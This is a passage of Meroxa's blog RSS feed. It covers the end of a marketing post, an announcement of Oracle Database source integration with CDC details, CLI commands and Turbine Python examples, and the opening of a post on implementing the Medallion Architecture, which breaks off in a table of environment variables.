&lt;li&gt;Open-Source - Built on open-source technology, Meroxa gives enterprises the security and flexibility they need. With no vendor lock-in and connectors for any data store (databases, cloud, SaaS apps, APIs, data lakes, and messaging systems), organizations can readily access and work with their data. Reliable, production-ready connectors for any data source can be built at warp speed using our open-source libraries.&lt;/li&gt;
&lt;li&gt;Easily manage hundreds of integrations - Meroxa automatically creates a shared data stream catalog and embeds it into your workflows so you can search, find, and reuse data streams effortlessly across programming languages. Building scalable and reusable development artifacts across clouds, programming languages, and projects makes developing with data significantly faster than traditional approaches.&lt;/li&gt;
&lt;li&gt;Build, Test, Iterate, Deploy - Build your stream processing application using a language of your choice, test with data samples that reflect your production environment, iterate as many times as needed, and then deploy your application, ultimately reaching business conclusions quicker with minimal effort and resources.&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;&lt;img src=&quot;https://20285798.fs1.hubspotusercontent-na1.net/hubfs/20285798/Is%20Data%20the%20New%20Oil%20Blog%20Image%202.png&quot; alt=&quot;Diagram illustrating how easy Meroxa makes it to build, test, iterate, and deploy.&quot;&gt;&lt;/p&gt;
&lt;h3&gt;&lt;strong&gt;Conclusion&lt;/strong&gt;&lt;/h3&gt;
&lt;p&gt;Meroxa is the only independent streaming integration vendor able to treat data like oil, thanks to our unique and disruptive code-first approach.&lt;/p&gt;
&lt;p&gt;&lt;em&gt;“You can manage the cloud vendors, or they will manage you. Meroxa gives you that with just 4 lines of code.”&lt;/em&gt;&lt;/p&gt;
&lt;p&gt;Meroxa can help turn your data into a commodity. Companies that realize the value of a &quot;developer-led&quot; vs. “platform-led” data strategy can quickly reduce their cloud costs and achieve a multi-cloud environment. With Meroxa being the only independent streaming integration platform able to treat data like a commodity, our customers have been able to realize tremendous value. To learn more about how Meroxa can help transform your data strategy, &lt;a href=&quot;https://landing.meroxa.com/demo_request&quot;&gt;schedule a demo&lt;/a&gt; today.&lt;/p&gt;</content:encoded></item><item><title><![CDATA[Announcing the Oracle Database Source Data Integration]]></title><description><![CDATA[Ingest, transform & stream data from your Oracle Database with Meroxa in a few lines of code.]]></description><link>https://meroxa.com/blog/oracle-database-data-integration</link><guid isPermaLink="false">https://meroxa.com/blog/oracle-database-data-integration</guid><dc:creator><![CDATA[Sara Menefee]]></dc:creator><pubDate>Wed, 15 Mar 2023 14:57:44 GMT</pubDate><content:encoded>&lt;p&gt;We are excited to announce that the Meroxa Platform now supports data integrations for Oracle Databases.&lt;/p&gt;
&lt;p&gt;Oracle Database, also known as Oracle or Oracle DB, is a relational database management system (RDBMS) developed by &lt;a href=&quot;https://www.oracle.com/corporate/&quot;&gt;Oracle Corporation&lt;/a&gt;. It is one of the most widely used databases in the world by large enterprise companies that require robust and dependable database solutions to store, process, and access data at a massive scale.&lt;/p&gt;
&lt;h3&gt;&lt;strong&gt;Oracle Database as a Source&lt;/strong&gt;&lt;/h3&gt;
&lt;p&gt;Meroxa&apos;s Turbine application framework lets you write code naturally by using Meroxa Functions to alter incoming data records and events from an Oracle Database source data stream before arriving at any downstream destinations, whether another database or system. The Turbine application framework supports programming languages such as JavaScript, Python, Ruby, and Go.&lt;/p&gt;
&lt;p&gt;When you deploy a Turbine streaming application with an Oracle Database source, the Meroxa Platform takes an initial snapshot of the source table. Once the snapshot is complete, it begins tracking new data records and events, including &lt;strong&gt;INSERT&lt;/strong&gt;, &lt;strong&gt;UPDATE&lt;/strong&gt;, and &lt;strong&gt;DELETE&lt;/strong&gt; operations, and pushes them into the data stream.&lt;/p&gt;
&lt;h3&gt;&lt;strong&gt;Real-Time Data Streaming with Change Data Capture&lt;/strong&gt;&lt;/h3&gt;
&lt;p&gt;Using Change Data Capture (CDC), we can process Oracle Database data record events in real-time. We do this by creating a tracking table and a database trigger to track event records.&lt;/p&gt;
&lt;p&gt;The tracking table and trigger have the same name as the source table, prefixed with MEROXA. The tracking table has all the same columns as the source table, plus three additional columns:&lt;/p&gt;
&lt;table&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th&gt;Column name&lt;/th&gt;
&lt;th&gt;Description&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;
&lt;tr&gt;
&lt;td&gt;CONNECTOR_TRACKING_ID&lt;/td&gt;
&lt;td&gt;The auto-increment index for the position.&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;CONNECTOR_OPERATION_TYPE&lt;/td&gt;
&lt;td&gt;The operation type, whether &lt;strong&gt;INSERT&lt;/strong&gt;, &lt;strong&gt;UPDATE&lt;/strong&gt;, or &lt;strong&gt;DELETE&lt;/strong&gt;.&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;CONNECTOR_TRACKING_CREATED_AT&lt;/td&gt;
&lt;td&gt;The timestamp of event record creation in the tracking table.&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;
&lt;/table&gt;
&lt;p&gt;An event record is written to the tracking table whenever data is added, changed, or deleted in an Oracle Database table. The queries retrieving these event records from the tracking table are similar to those used in Snapshot mode, but with CONNECTOR_TRACKING_ID as the ordering column.&lt;/p&gt;
&lt;p&gt;An Ack method collects the CONNECTOR_TRACKING_IDs of event records that have been successfully applied; those records are then removed from the tracking table every 5 seconds or when the connection is closed.&lt;/p&gt;
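&lt;p&gt;Conceptually, reading from the tracking table works like the following Python sketch (illustrative only, using an in-memory SQLite database in place of Oracle, and a hypothetical &lt;strong&gt;MEROXA_TRANSACTIONS&lt;/strong&gt; tracking table): event records are fetched in batches ordered by &lt;strong&gt;CONNECTOR_TRACKING_ID&lt;/strong&gt;, and acknowledged rows are deleted afterwards.&lt;/p&gt;

```python
import sqlite3

# Stand-in for the Oracle tracking table; sqlite3 keeps the sketch runnable.
conn = sqlite3.connect(":memory:")
conn.execute("""
    CREATE TABLE MEROXA_TRANSACTIONS (
        CONNECTOR_TRACKING_ID INTEGER PRIMARY KEY AUTOINCREMENT,
        CONNECTOR_OPERATION_TYPE TEXT,
        CONNECTOR_TRACKING_CREATED_AT TEXT DEFAULT CURRENT_TIMESTAMP,
        ID INTEGER, AMOUNT REAL  -- copies of the source table's columns
    )
""")

# In production the database trigger populates this table; we insert by hand.
conn.executemany(
    "INSERT INTO MEROXA_TRANSACTIONS (CONNECTOR_OPERATION_TYPE, ID, AMOUNT) "
    "VALUES (?, ?, ?)",
    [("INSERT", 1, 9.99), ("UPDATE", 1, 19.99), ("DELETE", 1, None)],
)

# Fetch a batch of events in tracking order.
batch = conn.execute(
    "SELECT CONNECTOR_TRACKING_ID, CONNECTOR_OPERATION_TYPE, ID, AMOUNT "
    "FROM MEROXA_TRANSACTIONS ORDER BY CONNECTOR_TRACKING_ID LIMIT 1000"
).fetchall()

# After downstream success, ack: remove the applied records.
acked = [row[0] for row in batch]
conn.executemany(
    "DELETE FROM MEROXA_TRANSACTIONS WHERE CONNECTOR_TRACKING_ID = ?",
    [(i,) for i in acked],
)

remaining = conn.execute("SELECT COUNT(*) FROM MEROXA_TRANSACTIONS").fetchone()[0]
print([row[1] for row in batch], remaining)
```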
&lt;h4&gt;&lt;strong&gt;Things to be aware of...&lt;/strong&gt;&lt;/h4&gt;
&lt;ul&gt;
&lt;li&gt;If the columns of a source Oracle Database table change, your Oracle Database administrator must apply the same changes to the tracking table.&lt;/li&gt;
&lt;li&gt;All tracking information only exists within the Oracle Database. Upon deletion of the tracking table, the tracking process will restart from the beginning by initiating a new snapshot of the table, which could lead to unintended replication of data downstream.&lt;/li&gt;
&lt;/ul&gt;
&lt;h3&gt;&lt;strong&gt;Creating an Oracle Database Resource on the Meroxa Platform&lt;/strong&gt;&lt;/h3&gt;
&lt;p&gt;Customers can create Resources for Oracle Databases using the Meroxa CLI or Dashboard. You must have a Meroxa account and be logged in to your account to get started.&lt;/p&gt;
&lt;h4&gt;&lt;strong&gt;Meroxa CLI&lt;/strong&gt;&lt;/h4&gt;
&lt;p&gt;In the following example, we create an Oracle Database Resource named &lt;strong&gt;my-oracle-db&lt;/strong&gt;. Resource names may contain lowercase letters, numbers, underscores, and hyphens. Use this name to reference your Oracle Database when writing your Turbine application code.&lt;/p&gt;
&lt;p&gt;Using the &lt;a href=&quot;https://docs.meroxa.com/cli/installation-guide&quot;&gt;Meroxa CLI&lt;/a&gt;, run the following command:&lt;/p&gt;
&lt;div class=&quot;gatsby-highlight&quot; data-language=&quot;shell-session&quot;&gt;&lt;pre class=&quot;language-shell-session&quot;&gt;&lt;code class=&quot;language-shell-session&quot;&gt;&lt;span class=&quot;token command&quot;&gt;&lt;span class=&quot;token shell-symbol important&quot;&gt;$&lt;/span&gt; &lt;span class=&quot;token bash language-bash&quot;&gt;meroxa resource create my-oracle-db &lt;span class=&quot;token parameter variable&quot;&gt;--type&lt;/span&gt; oracle &lt;span class=&quot;token parameter variable&quot;&gt;--url&lt;/span&gt; oracle://user:password@host.com:1571/database&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;
&lt;h4&gt;&lt;strong&gt;Meroxa Dashboard&lt;/strong&gt;&lt;/h4&gt;
&lt;p&gt;Below are the steps required to create an Oracle Database Resource using the &lt;a href=&quot;https://dashboard.meroxa.io/resources/new?type=oracle&quot;&gt;Meroxa Dashboard&lt;/a&gt;:&lt;/p&gt;
&lt;ol&gt;
&lt;li&gt;Navigate to the &lt;strong&gt;Resources&lt;/strong&gt; tab.&lt;/li&gt;
&lt;li&gt;Click the &lt;strong&gt;Add a Resource&lt;/strong&gt; button.&lt;/li&gt;
&lt;li&gt;Search for &lt;strong&gt;Oracle DB&lt;/strong&gt; using the search bar.&lt;/li&gt;
&lt;li&gt;Click the &lt;strong&gt;Add Resource&lt;/strong&gt; button for &lt;strong&gt;Oracle DB&lt;/strong&gt;.&lt;/li&gt;
&lt;li&gt;Confirm you are on the Add a resource form with Oracle DB selected.&lt;/li&gt;
&lt;li&gt;Provide a valid Resource Name (e.g., &lt;strong&gt;my-oracle-db&lt;/strong&gt;, &lt;strong&gt;myoracle&lt;/strong&gt;, &lt;strong&gt;oracle123&lt;/strong&gt;).&lt;/li&gt;
&lt;li&gt;Provide a valid Connection URL for your Oracle Database instance (e.g., oracle://user:password@host.com:1571/database-name).&lt;/li&gt;
&lt;li&gt;Click the Save button.&lt;/li&gt;
&lt;/ol&gt;
&lt;p&gt;A notification in the dashboard will appear once your Oracle Database Resource has been successfully created.&lt;/p&gt;
&lt;h3&gt;&lt;strong&gt;Using Oracle Database as a Source with Turbine&lt;/strong&gt;&lt;/h3&gt;
&lt;p&gt;Using Turbine, customers can use any Turbine-supported language such as JavaScript, Python, Ruby, or Go to stream and transform business-critical data from an Oracle Database table to any destination.&lt;/p&gt;
&lt;p&gt;The following example demonstrates how to do this with TurbinePy using Python.&lt;/p&gt;
&lt;p&gt;First, initialize your Turbine streaming app by running the following command in the Meroxa CLI:&lt;/p&gt;
&lt;div class=&quot;gatsby-highlight&quot; data-language=&quot;shell-session&quot;&gt;&lt;pre class=&quot;language-shell-session&quot;&gt;&lt;code class=&quot;language-shell-session&quot;&gt;&lt;span class=&quot;token command&quot;&gt;&lt;span class=&quot;token shell-symbol important&quot;&gt;$&lt;/span&gt; &lt;span class=&quot;token bash language-bash&quot;&gt;meroxa app init my-first-app &lt;span class=&quot;token parameter variable&quot;&gt;--lang&lt;/span&gt; python&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;You should receive confirmation from the Meroxa CLI that you&apos;ve initialized your Turbine streaming app, meaning the application files have been created locally in the current directory.&lt;/p&gt;
&lt;p&gt;From this point, run the following command to get to the root of the application code.&lt;/p&gt;
&lt;div class=&quot;gatsby-highlight&quot; data-language=&quot;shell-session&quot;&gt;&lt;pre class=&quot;language-shell-session&quot;&gt;&lt;code class=&quot;language-shell-session&quot;&gt;&lt;span class=&quot;token command&quot;&gt;&lt;span class=&quot;token shell-symbol important&quot;&gt;$&lt;/span&gt; &lt;span class=&quot;token bash language-bash&quot;&gt;&lt;span class=&quot;token builtin class-name&quot;&gt;cd&lt;/span&gt; my-first-app&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;Within your Turbine streaming app you will discover a &lt;strong&gt;main.py&lt;/strong&gt; file. Open this with your preferred code editor. You will see self-documented boilerplate code with a custom function written against the example data record set provided in a fixtures directory.&lt;/p&gt;
&lt;p&gt;Look for the following code with the &lt;strong&gt;resources&lt;/strong&gt; and &lt;strong&gt;records&lt;/strong&gt; methods:&lt;/p&gt;
&lt;div class=&quot;gatsby-highlight&quot; data-language=&quot;python&quot;&gt;&lt;pre class=&quot;language-python&quot;&gt;&lt;code class=&quot;language-python&quot;&gt;source &lt;span class=&quot;token operator&quot;&gt;=&lt;/span&gt; &lt;span class=&quot;token keyword&quot;&gt;await&lt;/span&gt; turbine&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;resources&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;token string&quot;&gt;&quot;source_name&quot;&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt;
records &lt;span class=&quot;token operator&quot;&gt;=&lt;/span&gt; &lt;span class=&quot;token keyword&quot;&gt;await&lt;/span&gt; source&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;records&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;token string&quot;&gt;&quot;collection_name&quot;&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt; &lt;span class=&quot;token punctuation&quot;&gt;{&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;}&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;The &lt;strong&gt;resources&lt;/strong&gt; method is used to specify a Resource on the Meroxa Platform. Replace &lt;strong&gt;source_name&lt;/strong&gt; with the name of your Oracle Database Resource. In the following example, we’ll use the name we used when creating the Oracle Database Resource &lt;strong&gt;my-oracle-db&lt;/strong&gt;.&lt;/p&gt;
&lt;div class=&quot;gatsby-highlight&quot; data-language=&quot;python&quot;&gt;&lt;pre class=&quot;language-python&quot;&gt;&lt;code class=&quot;language-python&quot;&gt;source &lt;span class=&quot;token operator&quot;&gt;=&lt;/span&gt; &lt;span class=&quot;token keyword&quot;&gt;await&lt;/span&gt; turbine&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;resources&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;token string&quot;&gt;&quot;my-oracle-db&quot;&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;The &lt;strong&gt;records&lt;/strong&gt; method is used to specify the respective table you wish to use as the source of data. In the following example, there is a table called &lt;strong&gt;transactions&lt;/strong&gt;. Replace &lt;strong&gt;collection_name&lt;/strong&gt; with the name of your Oracle Database table.&lt;/p&gt;
&lt;p&gt;In addition, you will need to indicate which column will be used for ordering rows. This column must contain unique, sortable values; otherwise, the snapshot will not work properly. In the following example, we will use the &lt;strong&gt;id&lt;/strong&gt; column.&lt;/p&gt;
&lt;div class=&quot;gatsby-highlight&quot; data-language=&quot;python&quot;&gt;&lt;pre class=&quot;language-python&quot;&gt;&lt;code class=&quot;language-python&quot;&gt;records &lt;span class=&quot;token operator&quot;&gt;=&lt;/span&gt; &lt;span class=&quot;token keyword&quot;&gt;await&lt;/span&gt; source&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;records&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;token string&quot;&gt;&quot;transactions&quot;&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;{&lt;/span&gt;&lt;span class=&quot;token string&quot;&gt;&quot;orderingColumn&quot;&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt;&lt;span class=&quot;token string&quot;&gt;&quot;id&quot;&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;}&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;There are a few additional configurations for Oracle Database Source data integrations that can be defined in your Turbine application code. In the following example, we want to change the &lt;strong&gt;batchSize&lt;/strong&gt; from its default value of &lt;strong&gt;1000&lt;/strong&gt; to &lt;strong&gt;2000&lt;/strong&gt;. We do this by including another key-value pair in the configuration object, which is the second argument of the &lt;strong&gt;records&lt;/strong&gt; method.&lt;/p&gt;
&lt;div class=&quot;gatsby-highlight&quot; data-language=&quot;python&quot;&gt;&lt;pre class=&quot;language-python&quot;&gt;&lt;code class=&quot;language-python&quot;&gt;records &lt;span class=&quot;token operator&quot;&gt;=&lt;/span&gt; &lt;span class=&quot;token keyword&quot;&gt;await&lt;/span&gt; source&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;records&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;token string&quot;&gt;&quot;transactions&quot;&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;{&lt;/span&gt;&lt;span class=&quot;token string&quot;&gt;&quot;orderingColumn&quot;&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt;&lt;span class=&quot;token string&quot;&gt;&quot;id&quot;&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt;&lt;span class=&quot;token string&quot;&gt;&quot;batchSize&quot;&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt;&lt;span class=&quot;token string&quot;&gt;&quot;2000&quot;&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;}&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;Below is a list of the supported configurations for Oracle Database sources.&lt;/p&gt;
&lt;table&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th&gt;&lt;strong&gt;Configuration&lt;/strong&gt;&lt;/th&gt;
&lt;th&gt;&lt;strong&gt;Requirement&lt;/strong&gt;&lt;/th&gt;
&lt;th&gt;&lt;strong&gt;Description&lt;/strong&gt;&lt;/th&gt;
&lt;th&gt;&lt;strong&gt;Example value&lt;/strong&gt;&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;
&lt;tr&gt;
&lt;td&gt;orderingColumn&lt;/td&gt;
&lt;td&gt;Required.&lt;/td&gt;
&lt;td&gt;The column name that the connector will use for ordering rows. The column must contain unique values and be suitable for sorting; otherwise the snapshot won&apos;t work correctly.&lt;/td&gt;
&lt;td&gt;id&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;snapshot&lt;/td&gt;
&lt;td&gt;Optional, default value is true.&lt;/td&gt;
&lt;td&gt;Enables or disables snapshots of the entire Oracle DB table before starting Change Data Capture (CDC) mode.&lt;/td&gt;
&lt;td&gt;false&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;batchSize&lt;/td&gt;
&lt;td&gt;Optional, default value is 1000.&lt;/td&gt;
&lt;td&gt;Sets the size of the rows batch. The minimum is 1 and the maximum is 100000.&lt;/td&gt;
&lt;td&gt;100&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;keyColumns&lt;/td&gt;
&lt;td&gt;Optional.&lt;/td&gt;
&lt;td&gt;If the field is empty, the connector makes a request to the database and uses the received list of primary keys of the specified table. If the table does not contain primary keys, the connector uses the value of the orderingColumn field as the keyColumns value.&lt;/td&gt;
&lt;td&gt;id,uuid&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;columns&lt;/td&gt;
&lt;td&gt;Optional.&lt;/td&gt;
&lt;td&gt;A list of column names that should be included in each record&apos;s payload, by default includes all columns.&lt;/td&gt;
&lt;td&gt;id,name,age&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;
&lt;/table&gt;
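&lt;p&gt;To make the table above concrete, here is a small, hypothetical Python helper (ours, not part of the Turbine SDK) that assembles the configuration dictionary passed as the second argument to &lt;strong&gt;records&lt;/strong&gt; and enforces the documented &lt;strong&gt;batchSize&lt;/strong&gt; bounds:&lt;/p&gt;

```python
def build_source_config(ordering_column, batch_size=None, snapshot=None,
                        key_columns=None, columns=None):
    """Assemble the Oracle source configuration described in the table above.

    Illustrative only; the connector simply receives the resulting dictionary.
    """
    config = {"orderingColumn": ordering_column}
    if batch_size is not None:
        # Documented bounds: min 1, max 100000 (default 1000).
        if not 1 <= int(batch_size) <= 100000:
            raise ValueError("batchSize must be between 1 and 100000")
        config["batchSize"] = str(batch_size)  # values are passed as strings
    if snapshot is not None:
        config["snapshot"] = "true" if snapshot else "false"
    if key_columns:
        config["keyColumns"] = ",".join(key_columns)
    if columns:
        config["columns"] = ",".join(columns)
    return config

# Matches the example above: ordering by "id" with a batch size of 2000.
config = build_source_config("id", batch_size=2000)
```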
&lt;p&gt;You’re ready to start streaming with an Oracle Database as a source for your Turbine streaming app!&lt;/p&gt;
&lt;h3&gt;&lt;strong&gt;What&apos;s next?&lt;/strong&gt;&lt;/h3&gt;
&lt;p&gt;All that&apos;s left for you to do is to write function code to transform the streaming data and event records to a downstream set of Resources or third-party APIs.&lt;/p&gt;
&lt;p&gt;Need ideas for a Turbine app using Oracle Database as a source? Check out &lt;a href=&quot;https://github.com/meroxa/turbine-examples&quot;&gt;our example Turbine apps&lt;/a&gt; to get started. But don&apos;t let this example hinder you. The sky&apos;s the limit for what you and your team can achieve.&lt;/p&gt;
&lt;p&gt;We can’t wait to see what you build! 🚀&lt;/p&gt;
&lt;p&gt;As always,&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;If you need help or have questions, please reach out at &lt;a href=&quot;mailto:support@meroxa.com&quot;&gt;support@meroxa.com&lt;/a&gt;.&lt;/li&gt;
&lt;li&gt;Join our &lt;a href=&quot;https://discord.meroxa.com/&quot;&gt;Discord&lt;/a&gt; community.&lt;/li&gt;
&lt;li&gt;Follow us on &lt;a href=&quot;https://twitter.com/meroxadata&quot;&gt;Twitter&lt;/a&gt;.&lt;/li&gt;
&lt;/ul&gt;</content:encoded></item><item><title><![CDATA[Medallion Architecture + Meroxa: Easily Work with Massive Amounts of Data]]></title><description><![CDATA[Learn how to implement the Medallion Architecture using Meroxa to streamline analytics and make it easier to work with large amounts of data.]]></description><link>https://meroxa.com/blog/medallion-architecture-meroxa</link><guid isPermaLink="false">https://meroxa.com/blog/medallion-architecture-meroxa</guid><dc:creator><![CDATA[Eric Cheatham and Tanveet Gill]]></dc:creator><pubDate>Fri, 03 Mar 2023 19:32:48 GMT</pubDate><content:encoded>&lt;p&gt;In today&apos;s data-driven world, the challenges of processing and analyzing large amounts of data continue to grow. Traditional data architectures take time to implement and don’t meet the needs of analytics on demand. Many organizations have created their own way to logically represent data as it is processed to help address the ever-increasing challenges of working with data; one such solution is the Medallion Architecture from &lt;a href=&quot;https://www.databricks.com/&quot;&gt;Databricks&lt;/a&gt;.&lt;/p&gt;
&lt;p&gt;The Medallion Architecture is a design pattern used to logically organize data in a &lt;a href=&quot;https://www.databricks.com/glossary/data-lakehouse&quot;&gt;Data Lakehouse&lt;/a&gt;, with the goal of progressively improving the overall quality of the data. It uses the &lt;a href=&quot;https://delta.io/&quot;&gt;Delta Lake framework&lt;/a&gt; to logically organize the data into three layers: Bronze, Silver, and Gold. At each layer, the data is refined to make the curated business-level tables more accessible, accurate, and actionable.&lt;/p&gt;
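&lt;p&gt;As a plain-Python sketch (illustrative only, with made-up fields; not Databricks or Meroxa code), the three layers can be thought of as successive refinements of the same records:&lt;/p&gt;

```python
# Bronze: raw, unfiltered records exactly as ingested.
bronze = [
    {"id": 1, "amount": "19.99", "country": "us"},
    {"id": 2, "amount": "5.00", "country": "US"},
    {"id": 2, "amount": "5.00", "country": "US"},  # duplicate row
]

def to_silver(records):
    """Silver: cleaned and enriched - typed fields, normalized, de-duplicated."""
    seen, silver = set(), []
    for r in records:
        if r["id"] in seen:
            continue
        seen.add(r["id"])
        silver.append({"id": r["id"], "amount": float(r["amount"]),
                       "country": r["country"].upper()})
    return silver

def to_gold(records):
    """Gold: business-level aggregate, e.g. revenue per country."""
    totals = {}
    for r in records:
        totals[r["country"]] = totals.get(r["country"], 0.0) + r["amount"]
    return totals

gold = to_gold(to_silver(bronze))
```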
&lt;p&gt;In this blog post, we demonstrate how you can implement the Medallion Architecture using Meroxa and Turbine to streamline analytics and make it easier to work with large amounts of data.&lt;/p&gt;
&lt;p&gt;💡 To learn more about the Medallion Architecture and how it improves data quality, you can read the Databricks primer.&lt;/p&gt;
&lt;h2&gt;What is Meroxa?&lt;/h2&gt;
&lt;p&gt;Meroxa is a Stream Processing Application Platform as a Service (SAPaaS) where developers can run and scale their Turbine apps using cloud-native best practices. Turbine is Meroxa’s stream processing application framework for building event-driven stream-processing apps that respond to data in real-time.&lt;/p&gt;
&lt;p&gt;Meroxa handles the underlying streaming infrastructure so developers can focus on building their applications. Turbine applications start with an upstream resource. Once that upstream resource is connected, Meroxa will take care of streaming the data into the Turbine application so it can be run.&lt;/p&gt;
&lt;p&gt;Since Meroxa is a developer-first platform, engineers can ingest, orchestrate, transform, and stream data to and from anywhere using languages they already know, such as &lt;a href=&quot;https://github.com/meroxa/turbine-go&quot;&gt;Go&lt;/a&gt;, &lt;a href=&quot;https://github.com/meroxa/turbine-js&quot;&gt;JavaScript&lt;/a&gt;, &lt;a href=&quot;https://github.com/meroxa/turbine-py&quot;&gt;Python&lt;/a&gt;, or &lt;a href=&quot;https://meroxa.com/blog/meroxa-now-streaming-on-ruby&quot;&gt;Ruby&lt;/a&gt;. Support for Java and C# is on the way.&lt;/p&gt;
&lt;p&gt;💡 Meroxa has support for many source and destination resources. You can see which resources are supported &lt;a href=&quot;https://meroxa.com/integrations/&quot;&gt;here&lt;/a&gt;. If there&apos;s a resource not listed, you can request it by joining our &lt;a href=&quot;https://discord.com/invite/pN24QPca6b&quot;&gt;community&lt;/a&gt; or by writing to &lt;a href=&quot;mailto:support@meroxa.com&quot;&gt;support@meroxa.com&lt;/a&gt;. Meroxa is capable of supporting &lt;strong&gt;any&lt;/strong&gt; data resource as a connector.&lt;/p&gt;
&lt;h2&gt;Overview&lt;/h2&gt;
&lt;p&gt;We want to implement a Delta Lake architecture using Meroxa and Turbine to move data from Bronze to Silver, and ultimately to business-level Gold data stores. To accomplish this we will use the following resources, all managed by the Meroxa platform:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;
&lt;p&gt;Bronze: PostgreSQL will serve as our raw, unfiltered data ingested from various sources&lt;/p&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;p&gt;Silver: Snowflake will serve as our intermediate cleaned and enriched data storage; valuable but not 100% business ready&lt;/p&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;p&gt;Gold: Amazon Web Services S3 will be where our business-ready data will live, normalized and stored in the Delta Table format&lt;/p&gt;
&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;As a bonus, we will also set up logging using &lt;a href=&quot;https://sentry.io/&quot;&gt;Sentry&lt;/a&gt;, an error tracking and monitoring platform, to catch and report any exceptions that come up when writing our data.&lt;/p&gt;
&lt;p&gt;Visually, our application will look like this:&lt;/p&gt;
&lt;p&gt;&lt;img src=&quot;https://lh6.googleusercontent.com/s8kxiMMDfxsLi0lC5_t-PWn6eWvzmg16_zage08dS8R3VhwkH4WbWYFrqtnXZF3b7u7TNqk0BoYTYQBcEtO61EwfUrQPz_JAAjNapYwFfXy4HbJ4CnWubwRI4jB9TpB36n06vsZhGfDKC99jqsbyCik&quot; alt=&quot;Diagram&quot;&gt;&lt;/p&gt;
&lt;h2&gt;Let’s get to the code&lt;/h2&gt;
&lt;p&gt;But first…&lt;/p&gt;
&lt;p&gt;Before we can begin we will need to set up a few things.&lt;/p&gt;
&lt;p&gt;First, on the Meroxa Platform we will need both a &lt;a href=&quot;https://docs.meroxa.com/platform/resources/postgresql/setup&quot;&gt;PostgreSQL&lt;/a&gt; resource and a &lt;a href=&quot;https://docs.meroxa.com/platform/resources/snowflake&quot;&gt;Snowflake&lt;/a&gt; resource. Using the documentation we can set up our Bronze PostgreSQL and Silver Snowflake resources.&lt;/p&gt;
&lt;p&gt;Secondly, we will need to set up our S3 bucket that will serve as our Delta Table resource. Although we will not need to add our S3 bucket to the Meroxa Platform in this particular example we will still need to set up access permissions as though we were. We can find those permissions in our &lt;a href=&quot;https://docs.meroxa.com/platform/resources/amazon-s3#permissions&quot;&gt;documentation&lt;/a&gt;.&lt;/p&gt;
&lt;p&gt;In addition to setting up our resources we will also need to gather a few extra bits of information. We need to set up the following environment variables:&lt;/p&gt;
&lt;table&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th&gt;&lt;strong&gt;Environment Variable&lt;/strong&gt;&lt;/th&gt;
&lt;th&gt;&lt;strong&gt;Description&lt;/strong&gt;&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;
&lt;tr&gt;
&lt;td&gt;AWS_ACCESS_KEY_ID&lt;/td&gt;
&lt;td&gt;AWS Access Key for user accessing buckets&lt;/td&gt;
&lt;/tr&gt;
